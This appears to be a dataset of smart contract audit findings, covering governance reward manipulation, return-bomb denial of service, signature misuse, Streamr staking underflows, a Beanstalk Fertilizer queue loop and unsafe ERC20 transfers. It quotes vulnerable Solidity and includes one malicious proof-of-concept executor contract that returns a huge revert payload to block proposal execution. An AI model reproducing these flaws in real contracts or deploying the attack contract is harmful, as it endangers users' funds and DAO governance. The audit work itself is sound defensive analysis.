`GovSettings::editSettings` is one of the functions that can be executed via an internal proposal. When this function is called, setting are validated via `GovSettings::_validateProposalSettings`. This function does not check the value of `RewardsInfo::voteRewardsCoefficient` while updating the settings. There is neither a floor nor a cap for this setting.\\nHowever, we've noted that this coefficient amplifies voting rewards as calculated in the `GovPoolRewards::_getInitialVotingRewards` shown below.\\n```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n\\nThis has the unintended side-effect that for the same proposal, different voters can get paid different rewards based on when the reward was claimed. In the extreme case where `core.settings.rewardsInfo.voteRewardsCoefficient` is voted to 0, note that we have a situation where voters who claimed rewards before the update got paid as promised whereas voters who claimed later got nothing.
Consider freezing `voteRewardMultiplier` and the time of proposal creation. A prospective update of this setting via internal voting should not change rewards for old proposals.
Updating `rewardsCoefficient` can lead to unfair reward distribution on old proposals. Since voting rewards for a given proposal are communicated upfront, this could lead to a situation where promised rewards to users are not honoured.\\nProof of Concept: N/A
```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n
Proposal execution can be DOSed with return bombs when calling untrusted execution contracts
medium
`GovPool::execute` does not check for return bombs when executing a low-level call. A return bomb is a large bytes array that expands the memory so much that any attempt to execute the transaction will lead to an `out-of-gas` exception.\\nThis can create potentially risky outcomes for the DAO. One possible outcome is "single sided" execution, ie. "actionsFor" can be executed when voting is successful while "actionsAgainst" can be DOSed when voting fails.\\nA clever proposal creator can design a proposal in such a way that only `actionsFor` can be executed and any attempts to execute `actionsAgainst` will be permanently DOS'ed (refer POC contract). T\\nThis is possible because the `GovPoolExecute::execute` does a low level call on potentially untrusted `executor` assigned to a specific action.\\n```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n
Consider using `ExcessivelySafeCall` while calling untrusted contracts to avoid return bombs.
Voting actions can be manipulated by a creator causing two potential issues:\\nProposal actions can never be executed even after successful voting\\nOne-sided execution where some actions can be executed while others can be DOSed\\nProof of Concept: Consider the following malicious proposal action executor contract. Note that when the proposal passes (isVotesFor = true), the `vote()` function returns empty bytes and when the proposal fails (isVotesFor = false), the same function returns a huge bytes array, effectively causing an "out-of-gas" exception to any caller.\\n```\\ncontract MaliciousProposalActionExecutor is IProposalValidator{\\n\\n function validate(IGovPool.ProposalAction[] calldata actions) external view override returns (bool valid){\\n valid = true;\\n }\\n\\n function vote(\\n uint256 proposalId,\\n bool isVoteFor,\\n uint256 voteAmount,\\n uint256[] calldata voteNftIds\\n ) external returns(bytes memory result){\\n\\n if(isVoteFor){\\n // @audit implement actions for successful vote\\n return ""; // 0 bytes\\n }\\n else{\\n // @audit implement actions for failed vote\\n\\n // Create a large bytes array\\n assembly{\\n revert(0, 1_000_000)\\n }\\n }\\n\\n }\\n}\\n```\\n
```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n
Use low-level `call()` to prevent gas griefing attacks when returned data not required
low
Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool status, ) = payable(receiver).call{value: amount}("");\\nrequire(status, "Gov: failed to send eth");\\n```\\n\\nIs the same as writing:\\n```\\n(bool status, bytes memory data ) = payable(receiver).call{value: amount}("");\\nrequire(status, "Gov: failed to send eth");\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool status;\\nassembly {\\n status := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\n```\\n\\nConsider using ExcessivelySafeCall.
Contracts unnecessarily expose themselves to gas griefing attacks.
```\\n(bool status, ) = payable(receiver).call{value: amount}("");\\nrequire(status, "Gov: failed to send eth");\\n```\\n
`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`
low
`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`.\\nUse `abi.encode()` instead which will pad items to 32 bytes, which will prevent hash collisions (e.g. `abi.encodePacked(0x123,0x456)` => `0x123456` => `abi.encodePacked(0x1,0x23456)`, but `abi.encode(0x123,0x456)` => 0x0...1230...456).\\nUnless there is a compelling reason, `abi.encode` should be preferred. If there is only one argument to `abi.encodePacked()` it can often be cast to `bytes()` or `bytes32()` instead. If all arguments are strings and or bytes, `bytes.concat()` should be used instead.\\nProof of Concept:\\n```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n\\n```\\nFile: libs/gov/gov-pool/GovPoolOffchain.sol\\n\\n return keccak256(abi.encodePacked(resultsHash, block.chainid, address(this)));\\n```\\n\\n```\\nFile: user/UserRegistry.sol\\n\\n _signatureHashes[_documentHash][msg.sender] = keccak256(abi.encodePacked(signature));\\n```\\n
See description.
null
```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n
A removal signature might be applied to the wrong `fid`.
medium
A remove signature is used to remove a key from `fidOwner` using `KeyRegistry.removeFor()`. And the signature is verified in `_verifyRemoveSig()`.\\n```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n\\nBut the signature doesn't specify a `fid` to remove and the below scenario would be possible.\\nAlice is an owner of `fid1` and she created a removal signature to remove a `key` but it's not used yet.\\nFor various reasons, she became an owner of `fid2`.\\n`fid2` has a `key` also but she doesn't want to remove it.\\nBut if anyone calls `removeFor()` with her previous signature, the `key` will be removed from `fid2` unexpectedly.\\nOnce a key is removed, `KeyState` will be changed to `REMOVED` and anyone including the owner can't retrieve it.
The removal signature should contain `fid` also to be invalidated for another `fid`.
A key remove signature might be used for an unexpected `fid`.
```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n
`VoteKickPolicy._endVote()` might revert forever due to underflow
high
In `onFlag()`, `targetStakeAtRiskWei[target]` might be less than the total rewards for the flagger/reviewers due to rounding.\\n```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n\\nLet's assume `flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei = 100, StreamrConfig.slashingFraction = 0.03e18(3%), minimumStakeWei() = 1000 * 1e18 / 0.03e18 = 10000 / 3 = 3333.`\\nIf we suppose `stakedWei[target] = streamrConfig.minimumStakeWei()`, then `targetStakeAtRiskWei[target]` = 3333 * 0.03e18 / 1e18 = 99.99 = 99.\\nAs a result, `targetStakeAtRiskWei[target]` is less than total rewards(=100), and `_endVote()` will revert during the reward distribution due to underflow.\\nThe above scenario is possible only when there is a rounding during `minimumStakeWei` calculation. So it works properly with the default `slashingFraction = 10%`.
Always round the `minimumStakeWei()` up.
The `VoteKickPolicy` wouldn't work as expected and malicious operators won't be kicked forever.
```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n
Possible overflow in `_payOutFirstInQueue`
high
In `_payOutFirstInQueue()`, possible revert during `operatorTokenToDataInverse()`.\\n```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n\\nIf a delegator calls `undelegate()` with `type(uint256).max`, `operatorTokenToDataInverse()` will revert due to uint overflow and the queue logic will be broken forever.\\n```\\n function operatorTokenToDataInverse(uint dataWei) external view returns (uint operatorTokenWei) {\\n return dataWei * this.totalSupply() / valueWithoutEarnings();\\n }\\n```\\n
We should cap `amountDataWei` before calling `operatorTokenToDataInverse()`.
The queue logic will be broken forever because `_payOutFirstInQueue()` keeps reverting.
```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n
Wrong validation in `DefaultUndelegationPolicy.onUndelegate()`
high
In `onUndelegate()`, it checks if the operator owner still holds at least `minimumSelfDelegationFraction` of total supply.\\n```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), "error_selfDelegationTooLow");\\n }\\n```\\n\\nBut `amount` means the DATA token `amount` and `balanceOf(owner)` indicates the `Operator` token balance and it's impossible to compare them directly.
`onUndelegate()` should compare amounts after converting to the same token.
The operator owner wouldn't be able to undelegate because `onUndelegate()` works unexpectedly.
```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), "error_selfDelegationTooLow");\\n }\\n```\\n
Malicious target can make `_endVote()` revert forever by forceUnstaking/staking again
high
In `_endVote()`, we update `forfeitedStakeWei` or `lockedStakeWei[target]` according to the target's staking status.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n\\nWe consider the target is still active if he has a positive staking amount. But we don't know if he has unstaked and staked again, so the below scenario would be possible.\\nThe target staked 100 amount and a flagger reported him.\\nIn `onFlag()`, `lockedStakeWei[target]` = targetStakeAtRiskWei[target] = 100.\\nDuring the voting period, the target called `forceUnstake()`. Then `lockedStakeWei[target]` was reset to 0 in `Sponsorship._removeOperator()`.\\nAfter that, he stakes again and `_endVote()` will revert forever at L195 due to underflow.\\nAfter all, he won't be flagged again because the current flagging won't be finalized.\\nFurthermore, malicious operators would manipulate the above state by themselves to earn operator rewards without any risks.
Perform stake unlocks in `_endVote()` without relying on the current staking amounts.
Malicious operators can bypass the flagging system by reverting `_endVote()` forever.
```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n
In `VoteKickPolicy.onFlag()`, `targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` and `_endVote()` would revert.
medium
`targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` in `onFlag()`.\\n```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n\\nFor example,\\nAt the first time, `streamrConfig.minimumStakeWei()` = 100 and an operator(=target) has staked 100.\\n`streamrConfig.minimumStakeWei()` was increased to 2000 after a reconfiguration.\\n`onFlag()` is called for target and `targetStakeAtRiskWei[target]` will be `max(100, 2000) * 10% = 200`.\\nIn `_endVote()`, `slashingWei = _kick(target, slashingWei)` will be 100 because target has staked 100 only.\\nSo it will revert due to underflow during the reward distribution.
`onFlag()` should check if a target has staked enough funds for rewards and handle separately if not.
Operators with small staked funds wouldn't be kicked forever.
```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n
Possible front running of `flag()`
medium
The `target` might call `unstake()/forceUnstake()` before a flagger calls `flag()` to avoid a possible fund loss. Also, there would be no slash during the unstaking for `target` when it meets the `penaltyPeriodSeconds` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, "error_cannotFlagSelf");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], "error_cannotFlagAgain"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), "error_notEnoughStake");\\n require(stakedWei[target] > 0, "error_flagTargetNotStaked"); //@audit possible front run\\n```\\n
There is no straightforward mitigation but we could implement a kind of `delayed unstaking` logic for some percent of staking funds.
A malicious target would bypass the kick policy by front running.
```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, "error_cannotFlagSelf");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], "error_cannotFlagAgain"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), "error_notEnoughStake");\\n require(stakedWei[target] > 0, "error_flagTargetNotStaked"); //@audit possible front run\\n```\\n
In `Operator._transfer()`, `onDelegate()` should be called after updating the token balances
medium
In `_transfer()`, `onDelegate()` is called to validate the owner's `minimumSelfDelegationFraction` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this "delegation"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n\\nBut `onDelegate()` is called before updating the token balances and the below scenario would be possible.\\nThe operator owner has 100 shares(required minimum fraction). And there are no undelegation policies.\\nLogically, the owner shouldn't be able to transfer his 100 shares to a new delegator due to the min fraction requirement in `onDelegate()`.\\nBut if the owner calls `transfer(owner, to, 100)`, `balanceOf(owner)` will be 100 in `onDelegation()` and it will pass the requirement because it's called before `super._transfer()`.
`onDelegate()` should be called after `super._transfer()`.
The operator owner might transfer his shares to other delegators in anticipation of slashing, to avoid slashing.
```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this "delegation"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n
`onTokenTransfer` does not validate if the call is from the DATA token contract
medium
`SponsorshipFactory::onTokenTransfer` and `OperatorFactory::onTokenTransfer` are used to handle the token transfer and contract deployment in a single transaction. But there is no validation that the call is from the DATA token contract and anyone can call these functions.\\nThe impact is low for `Sponsorship` deployment, but for `Operator` deployment, `ClonesUpgradeable.cloneDeterministic` is used with a salt based on the operator token name and the operator address. An attacker can abuse this to cause DoS for deployment.\\nWe see that this validation is implemented correctly in other contracts like `Operator`.\\n```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n
Add a validation to ensure the caller is the actual DATA contract.
Attackers can prevent the deployment of `Operator` contracts.
```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n
Insufficient validation of new Fertilizer IDs allow for a denial-of-service (DoS) attack on `SeasonFacet::gm` when above peg, once the last element in the FIFO is paid
medium
A Fertilizer NFT can be interpreted as a bond without an expiration date which is to be repaid in Beans and includes interest (Humidity). This bond is placed in a FIFO list and intended to recapitalize the $77 million in liquidity stolen during the April 2022 exploit. One Fertilizer can be purchased for 1 USD worth of WETH: prior to BIP-38, this purchase was made using USDC.\\nEach fertilizer is identified by an Id that depends on `s.bpf`, indicating the cumulative amount of Beans paid per Fertilizer. This value increases each time `Sun::rewardToFertilizer` is called, invoked by `SeasonFacet::gm` if the Bean price is above peg. Therefore, Fertilizer IDs depend on `s.bpf` at the moment of minting, in addition to the amount of Beans to be paid.\\nThe FIFO list has following components:\\ns.fFirst: Fertilizer Id corresponding to the next Fertilizer to be paid.\\ns.fLast: The highest active Fertilizer Id which is the last Fertilizer to be paid.\\ns.nextFid: Mapping from Fertilizer Id to Fertilizer id, indicating the next element of a linked list. If an Id points to 0, then there is no next element.\\nMethods related to this FIFO list include: LibFertilizer::push: Add an element to the FIFO list. LibFertilizer::setNext: Given a fertilizer id, add a pointer to next element in the list LibFertilizer::getNext: Get next element in the list.\\nThe intended behaviour of this list is to add a new element to its end whenever a new fertilizer is minted with a new Id. Intermediate addition to the list was formerly allowed only by the Beanstalk DAO, but this functionality has since been deprecated in the current upgrade with the removal of `FertilizerFacet::addFertilizerOwner`.\\nConsequences of replacing BEAN:3CRV MetaPool with the BEAN:ETH Well: Before this upgrade, addition of 0 Fertilizer through `LibFertilizer::addFertilizer` was impossible due to the dependency on Curve in LibFertilizer::addUnderlying:\\n```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n\\nHowever, with the change of dependency involved in the Wells integration, this restriction no longer holds:\\n```\\n function addUnderlying(uint256 usdAmount, uint256 minAmountOut) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // Calculate how many new Deposited Beans will be minted\\n uint256 percentToFill = usdAmount.mul(C.precision()).div(\\n remainingRecapitalization()\\n );\\n uint256 newDepositedBeans;\\n if (C.unripeBean().totalSupply() > s.u[C.UNRIPE_BEAN].balanceOfUnderlying) {\\n newDepositedBeans = (C.unripeBean().totalSupply()).sub(\\n s.u[C.UNRIPE_BEAN].balanceOfUnderlying\\n );\\n newDepositedBeans = newDepositedBeans.mul(percentToFill).div(\\n C.precision()\\n );\\n }\\n\\n // Calculate how many Beans to add as LP\\n uint256 newDepositedLPBeans = usdAmount.mul(C.exploitAddLPRatio()).div(\\n DECIMALS\\n );\\n\\n // Mint the Deposited Beans to Beanstalk.\\n C.bean().mint(\\n address(this),\\n newDepositedBeans\\n );\\n\\n // Mint the LP Beans to the Well to sync.\\n C.bean().mint(\\n address(C.BEAN_ETH_WELL),\\n newDepositedLPBeans\\n );\\n\\n // @audit If nothing was previously deposited this function returns 0, IT DOES NOT REVERT\\n uint256 newLP = IWell(C.BEAN_ETH_WELL).sync(\\n address(this),\\n minAmountOut\\n );\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(usdAmount);\\n }\\n```\\n\\nGiven that the new integration does not revert when attempting to add 0 Fertilizer, it is now possible to add a self-referential node to the end FIFO list, but only if this is the first Fertilizer NFT to be minted for the current season by twice calling `FertilizerFacet.mintFertilizer(0, 0, 0, mode)`. The validation performed to prevent duplicate ids is erroneously bypassed given the Fertilizer amount for the given Id remains zero.\\n```\\n function push(uint128 id) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (s.fFirst == 0) {\\n // Queue is empty\\n s.season.fertilizing = true;\\n s.fLast = id;\\n s.fFirst = id;\\n } else if (id <= s.fFirst) {\\n // Add to front of queue\\n setNext(id, s.fFirst);\\n s.fFirst = id;\\n } else if (id >= s.fLast) { // @audit this block is entered twice\\n // Add to back of queue\\n setNext(s.fLast, id); // @audit the second time, a reference is added to the same id\\n s.fLast = id;\\n } else {\\n // Add to middle of queue\\n uint128 prev = s.fFirst;\\n uint128 next = getNext(prev);\\n // Search for proper place in line\\n while (id > next) {\\n prev = next;\\n next = getNext(next);\\n }\\n setNext(prev, id);\\n setNext(id, next);\\n }\\n }\\n```\\n\\nDespite first perhaps seeming harmless, this element can never be remove unless otherwise overridden:\\n```\\n function pop() internal returns (bool) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n uint128 first = s.fFirst;\\n s.activeFertilizer = s.activeFertilizer.sub(getAmount(first)); // @audit getAmount(first) would return 0\\n uint128 next = getNext(first);\\n if (next == 0) { // @audit next != 0, therefore this conditional block is skipped\\n // If all Unfertilized Beans have been fertilized, delete line.\\n require(s.activeFertilizer == 0, "Still active fertilizer");\\n s.fFirst = 0;\\n s.fLast = 0;\\n s.season.fertilizing = false;\\n return false;\\n }\\n s.fFirst = getNext(first); // @audit this gets s.first again\\n return true; // @audit always returns true for a self-referential node\\n }\\n```\\n\\n`LibFertilizer::pop` is used in `Sun::rewardToFertilizer` which is called through `Sun::rewardBeans` when fertilizing. This function is called through `Sun::stepSun` if the current Bean price is above peg. By preventing the last element from being popped from the list, assuming this element is reached, an infinite loop occurs given that the `while` loop continues to execute, resulting in denial-of-service on `SeasonFacet::gm` when above peg.\\nThe most remarkable detail of this issue is that this state can be forced when above peg and having already been fully recapitalized. Given that it is not possible to mint additional Fertilizer with the associated Beans, this means that a DoS attack can be performed on `SeasonFacet::gm` once recapitalization is reached if the BEAN price is above peg.
Despite being a complex issue to explain, the solution is as simple as replacing `>` with `>=` in `LibFertilizer::addFertilizer` as below:\\n```\\n function addFertilizer(\\n uint128 season,\\n uint256 fertilizerAmount,\\n uint256 minLP\\n ) internal returns (uint128 id) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n uint128 fertilizerAmount128 = fertilizerAmount.toUint128();\\n\\n // Calculate Beans Per Fertilizer and add to total owed\\n uint128 bpf = getBpf(season);\\n s.unfertilizedIndex = s.unfertilizedIndex.add(\\n fertilizerAmount.mul(bpf)\\n );\\n // Get id\\n id = s.bpf.add(bpf);\\n // Update Total and Season supply\\n s.fertilizer[id] = s.fertilizer[id].add(fertilizerAmount128);\\n s.activeFertilizer = s.activeFertilizer.add(fertilizerAmount);\\n // Add underlying to Unripe Beans and Unripe LP\\n addUnderlying(fertilizerAmount.mul(DECIMALS), minLP);\\n // If not first time adding Fertilizer with this id, return\\n// Remove the line below\\n if (s.fertilizer[id] > fertilizerAmount128) return id;\\n// Add the line below\\n if (s.fertilizer[id] >= fertilizerAmount128) return id; // prevent infinite loop in `Sun::rewardToFertilizer` when attempting to add 0 Fertilizer, which could DoS `SeasonFacet::gm` when recapitalization is fulfilled\\n // If first time, log end Beans Per Fertilizer and add to Season queue.\\n push(id);\\n emit SetFertilizer(id, bpf);\\n }\\n```\\n
It is possible to perform a denial-of-service (DoS) attack on `SeasonFacet::gm` if the Bean price is above the peg, either once fully recapitalized or when reaching the last element of the Fertilizer FIFO list.\\nProof of Concept: This coded PoC can be run by:\\nCreating file `Beantalk/protocol/test/POCs/mint0Fertilizer.test.js`\\nNavigating to `Beantalk/protocol`\\nRunning `yarn test --grep "DOS last fertilizer payment through minting 0 fertilizers"`
```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n
Use safe transfer for ERC20 tokens
medium
The protocol intends to support all ERC20 tokens but the implementation uses the original transfer functions. Some tokens (like USDT) do not implement the EIP20 standard correctly and their transfer/transferFrom function return void instead of a success boolean. Calling these functions with the correct EIP20 function signatures will revert.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");\\n }\\n```\\n
We recommend using OpenZeppelin's SafeERC20 versions with the safeTransfer and safeTransferFrom functions that handle the return value check as well as non-standard-compliant tokens.
Tokens that do not correctly implement the EIP20 like USDT, will be unusable in the protocol as they revert the transaction because of the missing return value.
```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");\\n }\\n```\\n
Fee-on-transfer tokens are not supported
medium
